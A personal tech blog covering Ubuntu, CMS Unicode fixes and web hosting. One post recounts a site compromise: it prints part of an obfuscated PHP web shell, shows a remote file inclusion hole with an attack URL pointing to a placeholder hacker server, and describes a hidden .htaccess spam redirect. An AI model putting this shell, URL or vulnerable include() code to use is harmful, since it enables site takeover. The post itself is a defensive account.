Showing posts with label Technology. Show all posts
Showing posts with label Technology. Show all posts

Wednesday, June 16, 2010

Netconnect on Ubuntu

I had a very good experience with Ubuntu's Lucid Lynx. I was trying to get my Reliance Netconnect USB stick to work on mu Ubuntu laptop. It's much simpler than I initially thought. Even simpler than setting it up on Mac OS or Windows.

Here are the steps:

  1. Put the stick in the USB port
  2. Open System -> Preference -> Network Connections
  3. Click on Mobile Boadband tab
  4. Click Add
  5. On the New Mobile Broadband Connection window, select HUAYWEI TECHNOLOGIES HUAWEI Mobile from the mobile broaband device dropdown (your device name may be different)
  6. Click Forward. Select India from the Country List
  7. Click Forward. Select Reliance from the Provider list (Tata Photon+ and Tata Plug2Surf are also listed there)
  8. Click Forward. Click Done.
  9. Select Reliance Connection in the Mobile Broadband tab and click Edit
  10. In the Edit windows Mobile Broadband tab use:
    • Number: #777
    • Username: <your device's mobile number>
    • Password: <your device's mobile number>
  11. Click Apply
You are done. Now, your Network Connection icon on top right panel will show and entry for Reliance Connection. Click on it to connect.

Sunday, March 29, 2009

Resume parsing score

I found this on Web. Being a programmer, I found it funny, but quite true.

 Resume Chart


[Source: http://www.hanovsolutions.com/resume_comic.png]

Thursday, March 26, 2009

Wordpress and Unicode

You type some non-English character in Wordpress or Drupal editors. You save it only to find those characters have become ????. If this describes your problem, then you have an issue with Unicode. You need to turn on Unicode support for Wordpress and Drupal. It will require some change of code. Basically, both Wordpress and Drupal supports Unicode. However, by default, the databases are not configured to store unicode characters.

Wordprss


For Wordpres, the modification is straight-forward.

  1. Open up ‘wp-config.php’ from the root directory of your WordPress installation.

  2. Comment out the following lines by adding ‘//’ at the very beginning of the following two lines:
    define('DB_CHARSET', 'utf8');
    define(’DB_COLLATE’, ”);


So that section should now look like this:
//define('DB_CHARSET', 'utf8');
//define(’DB_COLLATE’, ”);

[Source: http://hansengel.wordpress.com/2007/10/09/wordpress-unicode-and-s/]

Drupal


For Drupal, the change is a bit more involved:

  1. Go to to the root directory of your Drupal installation.

  2. Save the following code in a file named collate_db.php


  3. <?php
    # Do not change anything below this ( :-) <- Rewwrite Editors note.)
    require_once("includes/bootstrap.inc");
    require_once("includes/database.inc");
    require_once("includes/database.mysql.inc");
    $connect_url = 'mysql://user:pwd@server/database';
    $active_db = db_connect($connect_url);
    $sql = 'SHOW TABLES';
    if ( !( $result = db_query( $sql ) ) ) {
    echo '<span >Get SHOW TABLE - SQL Error: ' . $result . '<br>' . "</span>\n";
    }

    while ( $tables = db_fetch_array($result) ) {
    echo $tables[0];
    # Loop through all tables in this database
    $table = $tables[key($tables)];

    if ( !( $result2 = db_query("ALTER TABLE %s COLLATE utf8_general_ci", $table) ) ) {
    echo '<span >UTF SET - SQL Error: <br>' . "</span>\n";

    break;
    }

    print "$table changed to UTF-8 successfully.<br>\n";

    # Now loop through all the fields within this table
    if ( !($result2 = db_query("SHOW COLUMNS FROM %s",$table) ) ) {
    echo '<span >Get Table Columns Query - SQL Error: <br>' . "</span>\n";

    break;
    }

    while ( $column = db_fetch_array( $result2 ) )
    {
    $field_name = $column['Field'];
    $field_type = $column['Type'];

    # Change text based fields
    $skipped_field_types = array('char', 'text', 'enum', 'set');

    foreach ( $skipped_field_types as $type )
    {
    if ( strpos($field_type, $type) !== false )
    {
    $sql4 = "ALTER TABLE $table CHANGE `$field_name` `$field_name` $field_type CHARACTER SET utf8 COLLATE utf8_bin";
    $result4 = db_query($sql4);

    echo "---- $field_name changed to UTF-8 successfully.<br>\n";
    }
    }
    }
    echo "<hr>\n";
    }
    ?>



  4. Look at the red line in the code in red (5th line). You have to replace that part with your installation-specific information.

  5. Open the file sites/default/settings.php under the same Drupal root directory. Copy the rest of the line of
    $db_url =

    and paste it after
    $connect_url = 

    in the above code.

  6. Save collate_db.php

  7. Open a browser window and request the collate_db.php from your browser.

  8. If everything is fine you would see something similar to this:
    access changed to UTF-8 successfully.
    ---- mask changed to UTF-8 successfully.
    ---- type changed to UTF-8 successfully.

    <--- Lines not shown --->

    watchdog changed to UTF-8 successfully.
    ---- type changed to UTF-8 successfully.
    ---- message changed to UTF-8 successfully.
    ---- variables changed to UTF-8 successfully.
    ---- link changed to UTF-8 successfully.
    ---- location changed to UTF-8 successfully.
    ---- referer changed to UTF-8 successfully.
    ---- hostname changed to UTF-8 successfully.


  9. Delete collate_db.php for security.


You are done.

[Source: http://www.urbannatives.net/localtreechild/..._ci_and_tabl ]

Wednesday, February 04, 2009

Ain’t No Luddite

I am not an adopter. I don't work to stay ahead of the technology curve. Rather, I fall quite far back in that curve to see all my friends and most of my family and acquaintances pass by me and my wife. But the truth is that I am quite happy and content being a follower. I keep my OS at least one version behind the latest and the greatest. Currently, even though my sparingly-used Windows machine runs XP (used only for music production since I have already invested money and learning-time on software that runs only on Windows), I have the latest OS version (Ubuntu Intrepid Ibex 8.10) on my primary home machine. I resisted having a cell phone for quite some time before finally jumping on the bandwagon in 2003. Even then I have pretty basic cell phone which is used as a - surprise! surprise! - phone to call people. No blackberry, no iPhone, no Android, no nothing. We don't have a LCD or Plasma TV, mostly because we don't need it. We don't watch TV or movies that much. 90% of time, our TV is playing either Baby Einstein DVD or PBS Kids show. Our DVD player is a $25 Coby. My home theater is a 8-year old system. My Bose Acoustimass speakers are sitting comfortably in the closet, gathering dust. Five-and-half-years since we have moved into this house, I didn't get energy, urge or serious nudge from Paramita to hook those on. On the social networking side, I have got onto Orkut after a having a dormant account for quite a while, thanks to Paramita for finally making me active there. But that's been almost one-and-half years. By that time most of my friends there have moved on to the greener pasture of Facebook. I have too. But only recently. And I am still trying to figure things out there. Now I see people are using Twitter. I guess, it will take me at least an year or two before I get on to Twitter.

The reason I started this post is, I think the best thing that have happened in last two years on the Technology side, as far as I am concerned, is Pandora. It's really awesome. Those who haven't yet found Pandora: it's a Music Genome Project. The site says:
Together we set out to capture the essence of music at the most fundamental level. We ended up assembling literally hundreds of musical attributes or "genes" into a very large Music Genome. Taken together these genes capture the unique and magical musical identity of a song - everything from melody, harmony and rhythm, to instrumentation, orchestration, arrangement, lyrics, and of course the rich world of singing and vocal harmony. It's not about what a band looks like, or what genre they supposedly belong to, or about who buys their records - it's about what each individual song sounds like.

So the idea is that you start with one of your favorite songs. Then based on the musical attributes of the song, Pandora will select other songs. For each song, you can tell Pandora whether you like this song or not, thereby 'training' Pandora to your taste. You can create 'Radio Stations' based upon this song. A 'Radio Station' can be created by Artist or by Genre too. There is a cool feature called Quick Mix, which is basically a random play of songs from Station you have selected.

It's really easier to experience and experimet with Pandora than explain how it works. You need a registration for creating Stations. But registration is free and require very little information. However, there is one caveat. The service is only for North American audience. I understand that is due to some licensing issue. If you are in North Americal (or have an North American IP address ... wink wink), go there and have some wonderful musical experience.

Monday, February 02, 2009

Monday, January 05, 2009

Fast food for thought

I just rebooted my office machine running CentOS 4.6, which is based on Red Hat Enterprise distribution. It was running for 121 days, i.e almost 4 months!!

Ubuntu Intrepid and vpnc

My company has a decent work-from-home policy. Every Thursday we can work from home. And most do, including myself. In addition to the regular Thursdays, we work from home whenever there are project deadlines - which is almost always. Hence, to have a solid VPN connection is a must for me.

My last non-Ubuntu desktop was Fedora. I compiled the Cisco vpnclient and used it without a problem. When I switched to Ubuntu Edgy (6.10) I started using the open source vpnc which worked quite nicely. The upgrade to Fiesty (7.04) and Gutsy (7.10) worked fine too. But from Hardy (8.04) the problem of dead-peer-detection raised its ugly head. There were patches available, but that didn't solve the problem for me. I was looking forward to the Intrepid (8.10) release hoping the the vpnc issue will be resolved for good. After Intrepid was released there were contradictory reports about whether the dead-peer-detection issue has been resolved. I decided to test it out myself. So I upgraded to Intrepid.

vpnc can be used from command line, or else one can install the vpnc plugin for the network-manager (nm) and control the vpnc connection from the network-manager applet. Until now, I have only used the command-line. But this time I have tried both for testing. This is what I have found:

  • The dead-peer-detection issue is solved both in the command-line client as well as network-manager plugin when you pass the dead-peer-detection interval value 0 to the command-line program or check a box in the network-manager plugin.

  • network-manager plugin has a bug that overwrites the resolv.conf when the VPN is disconnected. I am forgetting what exactly is the nature of the bug, but basically it didn't revert back to the original resolv.conf after VPN session ended. The bug may only be for the static IPs.

  • Even if the dead-peer-detection issue was resolved, my VPN connection would just stall for a minute or two before continuing after I have typed about 10-15 characters in my SSH window. And this repeats over and over again. Googling the problem suggests something to do with routing table and/or DNS lookup. I tried different things for a while but none could resolve this issue.


At last I gave up and went back to the proprietary cisco vpnclient. I compiled and installed it following this post. Since then I am having a smooth VPN ride. I would love to go back to the open source vpnc client, but not at the expense of stability of connection. I need to earn my bread.

Sunday, May 11, 2008

Portrait of a hack

It's been a long time since I updated the page. Again. As I was intending to update the page with the report of my latest endeavor, something unexpected happened.

Last Sunday morning, I woke up to receive a terse mail from my hosting company - Host Monster - that my basus.net account had been deactivated due to "terms of service violation". So I called them. The Tech support guy confirmed that the account had really been deactivated because there is a phishing page lurking inside my site. He suggested that I talk to their Abuse department. Even though it was a Sunday, there was somebody in Abuse department I could talk to. She pointed me to a directory called 1/ inside my webroot folder. That, and few other files, seems to be gratuitous contributions of the hackers. She said once I removed the offending pages and they confirmed that I did, they could reactivate the account. I got off the phone and the first thing I did was to remove the 1/ directory. Looking back, I think, that was a knee-jerk reaction. I could have avoided that. I, then, moved my original webroot folder and put up a placeholder page instead. After these minor surgeries I called my hosting company's abuse department. She looked at the directory to confirm that the offending pages are really gone. Once confirmed she immediately reactivated my account. I briefly chatted with her about the possible backdoor and inquired if they had any tool to sniff backdoor. They don't have any tool but she gave me pointers to some usual suspect applications. Fortunately I didn't have any such application. However, that's unfortunate too, since now I have to hunt the backdoor myself manually. It also means that the backdoor is possibly an inadvertent creation of my sloppy coding. Tooo baad.

But one thing I want to mention here, I found my hosting company's support impeccable. They were helpful, to-the-point and not too finicky. Deactivating my site showed they had a good policy in place against questionable content. Kudos.

Once my mail server etc. are back online and offending material offline, I had a few tasks at hand. In order of priority, they were:

  1. Remove all injected files and content

  2. Find and fix backdoor

  3. Put site back online


So, here are some interesting things I have found on the way. These must have been well-documented in some security website. But, here is what I have found.

Modus Operandi: Once the hackers find a backdoor, they push a file through the backdoor. This file then becomes the hacker's gateway. They come and go through this door at will. They can pretty much see what's there inside, put files (scripts) there and sometimes hijacks the site.

File Extension: Some of the initial files that the hackers upload had .jpg extensions but they are actually PHP scripts. For example, php3.jpg, lila.jpg or sh6.jpg. I think, they want the site owner to overlook any .jpg file thinking they are image files hence harmless. PHP engine, though, is not fooled by the extension. It will execute file any extension as long as it is valid php code.

Offending files: The most interesting is php3.jpg. It looks like a binary file

 <? eval(gzinflate(base64_decode('
7b3peuJI0jD6+53nmXtQqT3ddhsjwHgrV7mH1cZm
B69VdTxCCJBZhCUBNv3WBZ1r+P59V3YicpFSCzau
qu5ZzvRMt1EukZFbZERkZMRvJx9+mw6mf/2LorQc
1XKMSV/S1NHI/utfjJ60+a43m2iOYU7u9SfDduxN
ua87Y0OzTMcY6/LWlvQ7LyGJOZuQMYIKmxszW9di
0gb8d0v6KOlP05HZ1TdlSY5JQumtY8nSnZk1kTY3
eyNTdbZIRWlb4p8I4Pjr17/+Rbcs07q39KlJsN3c
2zr+61/+bvQnpqXfQyXrXu1A1ma7eVkgWbbu3I/V
vqHdP85MR7fvrdmEtJrA7I2FMQHEbMdyzJG50K1N
e9aBr836Wf2+1oolYrvQy48fJRkKylChq/eMCfTA
xuEioxDz9xyh4tj1g+32p9omjlj0wEKbxtT2DylN
2/x5Q7Ws2Mbwoyyz6oZ9D0nq8ybmkCrQe1UbkG9J
tSUofLIxZ6VJ52bTKXRuY7glvYPOnJZr2Uy5hfBY
I1jzk7wxlL/gOH+V9JGtS78TeB8ZIiPVHui0JC3D
qzJokAgDet8sNC4LrTZUIzjej3Wrr29u3OdqtYtS
IbZxf1pow3/rtVYbx8pF3a0YxP+dYcMkbm4A8pAC
fwD0xpysBmjPHsx1xFFOxhPS1NJ3LH2kq4B8Z2aM
utJPyX35WFKU3Myy9IkjQWEbxhZXfK5WLZZOL5uZ
dqlWlTLVvNQqtNul6mmLrX59PHVgjGcTXEP2zBph
+/BbM82hAWtAOzqyByRDhhW8gT8QERnHAcdPBCKC


However, if you look closely, you will notice that it starts with "<? eval(gzinflate(base64_decode('". This basically tells the PHP engine to inflate the gzipped and base64 encoded content that follows. When I explode, it became a html which looks like this in a browser

PHP Shell Screenshot

Backdoor: There were a couple of backdoors in my site (at least the ones that I have found). All of them are similar.

PHP script can run another script by calling a function named include(). Suppose you have a script named foo.php and another named bar.php. In foo.php you may have a call like:
include('bar.php')

Now if you request foo.php from a browser, it will also execute bar.php, even though bar.php was not explicitly called or requested.

Now the bar.php does not need to reside on the same directory or even the same file system. bar.php may be sitting on a different webserver, 10000 miles away, reachable via a HTTP call - http://bar.com/bar.php. Now, still foo.php can execute bar.php via http. Your include will simply say,
include('http://bar.com/bar.php')

PHP will take care of opening a socket to the bar.com server, create a HTTP request to bar.php and execute its content after receiving the HTTP response.

Now, suppose, instead of hard-coded http://bar.com/bar.php as the argument of the include() call, you pass a request parameter - something that you got via a POST or a query-string.
$myscript = _REQUEST('myscript');
include('$myscript);

Now, you have a backdoor. How so? If a malicious hacker knows about this two lines, she can make a request to foo.php like this
http://<servername>/foo.php?myscript=http://<hackersserver>/malicious_script.php

foo.php will obidiently execute whatever malicious_script.php asks it to do. Now the question is how the hackers know of those to line of code. By looking at other links on your site (or other sites which links to your site) and guessing. This is not difficult.

I precisely had this backdoor. Three of them. I think hackers exploited two out of three. I have fixed the code, or I think I have until hackers expose another backdoor. I have also written couple of monitoring and reporting scripts which will periodically look for any change in my site. Let's see what happens.

On a subsequent post, I will try to write more about the files the hackers put.

Update: I never got a chance to write more about the files the hackers uploaded. However, another thing of importance here. The hackers modified my root .htaccess file. That's the configuration file for Apache web server and it affects the tree underneath, unless overwritten by another local .htaccess file. They put a Rewrite rule in the .htaccess. Apache rewrite rule basically can modify a request line. For example, a browser may request for a file called "foo.html". Via Rewrite rule, you can serve some other file, say "whatever.html". Since, this happens without browser's knowledge, browser still thinks that it got the requested foo.html file. That's exactly what happened in my case. The hackers wrote a rewrite rule in such a way that if a request came through a search result (identified by the Referer header), it shows some Viagra ad page that they uploaded. And be careful, they bury the Rewrite rule in .htaccess file after a bunch of blank lines, so that when you open the file in an editor, you won't see it without scrolling down. Very clever.

Friday, December 21, 2007

A Tale of Java, Ubuntu and Fonts

As a part of an ongoing Java project, I had designed a rudimentary Java text editor. The project is a WIP, so every so-many-months I put my minds on it only to stray away in a few days. Last time I worked on the editor part of it, I was running Fedora core with Java 1.4, maybe 1.5. The code loads a non-English font into the editor and then you can see those fonts as you type. The font is ttf font which was loaded as System fonts in /usr/share/fonts directory with the updated font-cache. It worked just fine, loading and showing this font (the name, BTW, is itxBeng. It's a Benagli font) without any glitch.

A couple of weeks back, I opened up the code on my Ubuntu 7.04 with Java 1.5. And surprise, surprise!! When I am supposed to see Bengali characters, I now see gibberish. My first reaction was that I might have changed some code and forgot about it. I told you, I haven't touched this code in a while. So I looked at the font-loading code, but did not find any problem or resolution. I was furiously scratching my head. No clue, what's happening!?

Next day I ran the code on my office computer, which is running CentOS 4 (basically repackaged Redhat distribution) and Java 1.5. To my not-so-big-surprise, the fonts loaded just fine. So I narrowed down the issue to Ubuntu problem. So next I installed Java 1.6 on my Ubuntu machine. This time the fonts loaded fine. I haven't played extensively after that, so don't know if there are other problems. But the most intriguing problem is gone, or at least I ahve found a work-around.

Bottom line: Ubuntu 7.04, Java 1.5 and ttf fonts manually loaded in system do not play well.

Friday, November 09, 2007

One more host change

For past few days I have been busy with accommodating another change of my host. This is my second change in as many months. I was hosting with 1and1.com since 2005. It was a decent host - excellent top notch service as far as server up-time, availability and speed are concerned. However two of the peeves that I had were it didn't offer enough features for the dough and there was no ssh service for my plan. 1and1.com also seems to have configured its service in a nonstandard way. For example, even with your own domain, your mail server domains will be 1and1.com; you cannot choose your own username for login, you are are forced to remember some random string of digits.

So I moved my host to Dreamhost on October. It has a very impressive array of features for a very decent price. I have seen its server held quite firm after a digg effect on one of the domains it hosted. Also read some reviews which even though didn't put it in the top performer slot, nevertheless put in somewhere near there. Since, my site is very very low traffic site, I didn't bother. But I should have. After moving, I spent quite a bit of time redesigning my site, only to discover that server response is not very good - barely acceptable. But the real damper was its mail server. The server that hosted my mailserver had a history of problem and Dreamhost was in the process of upgrading the hardware when I moved my host. Dada was complaining that he basically couldn't do anything on his mailbox. He was connecting via IMAP. The only think he could do is downloading the headers, but server timed-out 9 out of 10 times while downloading the body. I thought it was temporary. But even after the claimed hardware upgrade, things didn't improve. At that point I decided to quit. But to be fair, I must say that I didn't have any problem connecting to the mail server using POP3. In conclusion, I think Dreamhost has good intentions and all the makings of a good host, but it may need to put a lot more focus on performance at this time.

Then enters HostMonster. I read very good reviews about the host. More than one review sites put it on the top of the heap. It claims to host more than 200,000 domains. Even though most of the things in all Linux hosts are almost same, they have enough differences in settings that warrant at least a couple of days of tweaking my code to run seamlessly. Same story here. Finally I think I am done. The jury is still out, but so far I am seeing improved speed of access. Dada informed me that he now has no problem with mail connection using IMAP. Hopefully I can stay with these guys for some time.

Tuesday, October 23, 2007

SandR, Java, Perl and Regular Expression

A couple of years ago, I wrote a small utility for searching and replacing text in files. At that time, I was looking for such a tool and found none that's suitable enough for my need. So I wrote it and released it as a open source software (OSS) so that others can freely download it, use it and if needed modify it. I called it SandR (pronounced as sand-arr). It was not hugely popular, people downloaded it sparingly. As of today there are altogether 1,288 downloads. I would love to see that number going up, nonetheless it was satisfying to know at least some people found it useful.

I released it as pre-alpha version, which in software business means, "Feel free to use it, but do expect to see bugs and crashes". Not too many bugs were reported in last two years. So, I decided to upgrade it to "Production/Stable" status. In the process I tweaked the code for minor enhancement. Today, I have requested a release.

The unique feature for SandR is that it supports auto-detection of file encoding. I used the Java port of Mozilla's Character detection algorithm for detecting the character encoding of the files. SandR also supports regular expression for search string, although there are some other similar OSS utilities which provide regex support.


It's really very useful that Java now supports regex or Regular Expression. Previously regex was the power tools for the Perl programmers only. GNU had a C library from regex, but it was really the forte of Perl. So when Java 5 started supporting regex, programmers welcomed it enthusiastically. However, as we delved more into it, we found there are some differences between Perl and Java regex, nothing major though. One conversant in one will have absolutely no difficulty in understanding and using it in the other. But why? Why there has to be two flavors of the same utility, however small may be the difference? Techies and programmers are using regex for ages. They have become very conversant with the Perl type. Then why, oh why, introduce a minor variation? This is so Microsofty. Sun can do better. I haven't tried Java 6 yet since I do not use Java in my day job regularly, but I doubt Sun has changed the regex implementation. Don't know the plans for upcoming Java 7 release. But let's request Sun to abolish whatever minor differences there are between Java implementation of regex with its Perl counterpart. You can do it, Sun.

Thursday, October 18, 2007

Web 2.0

The place where I live, the San Francisco Bay Area, witnesses constant hype about technology. It also witnesses cyclical economic up and downturn like any other place on earth. By most account, right now we are going through an economic upturn here in the Silicon Valley. It's getting easier for the startups to get funding, mature startups are getting unsolicited funding proposals - even startups without any revenue or even without any solid business plan towards revenue are getting huge chunk of money to 'acquire customer'. Job market is hot. Good engineers on the lookout frequently end up with 3 or more viable job offers. Engineers who are not up for grab are getting unsolicited calls or emails from recruiters. It's 1999 all over again. The only difference is that the stock market is not yet showing "irrational exuberance" as Alan Greenspan had said.

Take the case of Web 2.0 (pronounce as web two dot o). There is a conference going on right now in San Francisco on Web 2.0. The first day was sold out with registration fees running into thousands. That shows there is a lot of interest and enthusiasm about Web 2.0. The tech blogs are constantly chattering about web 2.0. Tech columnists are dropping that term generously. Every other site is claiming that it is 'Web 2.0 enabled'. Now you go and ask 5 people what Web 2.0 actually is. You will get 5 different answer with couple more extra as bonuses. And chances are that all of them starts with, "To me web 2.0 is ...". That proves beyond any doubt that there is no definition, no coherent semantic explanation of the term, yet everybody is extremely excited about it. What else could be a better definition of hype!

First there was this Natural language search engine, then there were semantic web, then Internet 2.0 (which, by the way, is still alive but may not be kicking hard). There were SOA (Service Oriented Architecture), Middleware, thin client ... welcome to the hype-land.

Tuesday, October 16, 2007

Gutsy Gibbon coming!

A new Ubuntu release is due in a couple of days - Gutsy Gibbon, Ubuntu 7.10 (10th month of year 2007). The RC is out and reviewed. It got good reviews as usual. I remember my first experience with Ubuntu. I blogged that back in November 27, 2006 - reproduced here:

It was the Thanksgiving weekend. After doing the compulsory chores of eating and drinking merrily, taking a day trip for picnicking etc. I had enough time to fiddle with my home machine - the main one which is running Fedora Core 4. I decided that it's time to upgrade it to FC 6 which has come out last month. Historically I have upgraded every other FC release: started with FC2, skipped FC3, upgraded to FC4, skipped FC5. Well that's not enough history but you get the idea.


I fired up by BitTorrent client - Azureus, downloaded the FC6 torrent file and started downloaded a 3.6 GB DVD image of FC6. Then I went to the Thanksgiving dinner to Dada-BoThan's place. Came back and the DVD image was sitting there, ready to be burnt. Double checked that the download was right by doing the SHA1 sum and matching the signature with the one provided on the FC site. Put a blank DVD into the drive, fired up k3b and started burning the image onto the disk. I decided that that was enough for the day and went to bed.

Next morning, the disk was ready. So far so good. Rebooted the machine. While the machine was rebooting, I changed the BIOS setting to have the machine booted from the DVD instead of from the hard drive. Sure enough, FC6 installation screen came up, hit enter and I was on my happy way to upgrading my machine. Well, not so fast. The media test (which is, by the way, optional step during installation) said the media is faulty. Hmmmm. Anyway, I took the risk and went ahead with the installation anyway. But, sure enough after a while installation freaked out saying it cannot read certain package from the disk. Hm, I thought, the SHA1 sum was right, so this must be the burning process. So I went back to my FC4, reburnt another image on another media. Same process of rebooting with the same result - media integrity test failed.

I did the next thing one supposed to do - googled to see if anybody else had the same problem. Sure enough, a lot did.

At that point, I had to leave since we had a picnic plan for the day. The forced leaving was good since I had got enough time to think about the situation. Sure I could leave the system with FC4. It is working quite ok for my purpose. I have tweaked it to have all my required applications running fine, the peripherals are working fine too. Why fix something that ain't broken? On the other hand, I have been itching to see all the new things that have happened in the brave new world of Linux and Open Source since the time of FC4. Should I spend rest of my weekend to figure out a way to get FC6 installed? It's an iffy path at best. The other option is to use some other distro: may be Ubuntu? OpenSUSE? CentOS?

I am using CentOS at my work. It's a solid distribution based on Redhat. I know it works well. A known devil is better than an unknown? But it's still based on Redhat, that means there is not much room to play around there since I know that distro quite well.

OpenSUSE? Not right now after the Novell-Microsoft deal. I am not sure whether Novell has sold its soul to the devil (as a lot of Open Source people are saying). I would rather wait to see what all these mean.

Ubuntu seems to be a nice choice. The distrowatch.com says it is the most popular distro right now. There are lot of buzz about Ubuntu in this part of the world too. They also released their latest 6.10 last month and there are some very good reviews.

On the downside, this means I have to backup a lot of stuff for just in case. But, my new 320 GB USB hard drive was delivered just last Wednesday, that means backing up is so easy now. Decision made: let's go Ubuntu way.

I came back home, downloaded the Ubuntu torrent, fired up Azurus and started downloading the CD. Very pleasantly surprised that the Ubuntu installation can be done with only one CD. Great! The image finished downloading in no time. Burnt it on a CD. And waited for my almost 50GB backup to finish.

Once backup is done, started installing Ubuntu. It doesn't have a graphical installer like FC does (anaconda), but it was enough for my purpose. Moreover, you don't have to select your packages at installation time. That was good since that way the installation process was quick and sweet.

Installation was done in about a few minutes, rebooted the system and the system came up much faster than FC4. Plugged in my USB harddrive, Ubuntu immediately recognizes it. It recognized the network automatically. And at the very first go, I am on internet which I connect through a DSL router. Next stop printer setup. I have a Brother DCP 1000. With FC I had to do some work to have my printer working. But with Ubuntu's printer setup applet, the system found my printer, though it thought that it is Brother DCP 1200. With a small googling I found the right driver for DCP 1000, set that in the properties applet for the printer (no need to download or install driver, the driver came with the distribution) and my printer was set up.

Next: sound. By default ALSA keeps the Wave Surround channel muted. Opened up the Sound Preference applet, unmuted Wave Surround channel and I have my sound (BTW, I have a SBLive! soundcard).

The only thing left to do was my VPN connection since I do my work-work from home a lot. VPN client installation on FC4 was also a bit involved. Good that I kept the note. Following that note I downloaded, compiled and installed the VPN client. It's working now, I can connect to work just like I did in FC4 with one difference: in Ubuntu I have to start the VPN client with sudo. Yet to find out why and more importantly how to solve this issue. But since I can work fine, the issue is not that pressing.

Now, I am a happy Ubuntu user (and an ex-FC user). I still have to set up my SFTP server, check how my Digital camera and camcorder works etc. But Synaptic, package management is very easy in Ubuntu. I am sure, these wont be that big a deal. But still, wish me luck.

Monday, October 15, 2007

New look!

I never blogged seriously. I had a blog, which I called an online journal. I hand-rolled that blogging software. It worked moderately ok with my seldom blogging. I didn't have too many requirements, so it was quite spartan in terms of features. The presentation was done in XML with XSL. You can well guess it was a geeky piece of one-of-a-kind software.

Then I changed my hosting company. It came with blogging software - not just one, but you can choose one from many. I don't expect to be an avid blogger suddenly, though I sure hope to become one. But I decided to install one blogging software - any one - to see the features. The first one listed was Wordpress. I heard the name, so I went with it. I don't regret, actually I am quite impressed with it. Playing with the themes there, I chose something called Almost-Spring. I liked it. I tweaked the color scheme a bit, customized the sidebar, footer and borrowed the edited theme as the theme of my website. The change required changing layout for all the pages. In order to do so, I recoded the PHP pages, so that the next time I need to change the look of the site, I don't need to change each individual file. So, it has become sort of a home-brewed one-of-a-kind CMS. Yes, it is Deja Vu all over again.

So what about my old blog postings? I can possibly hack Wordpress to post backdated. But I do not have too many posts that I care about, and most of them are not time-topical anyway - either way it's not worth the time and effort the hack. I can just cut and paste some of them into this new blog and change the world! Keep checking this space for some earth-shattering old blog posts. Till then, bye.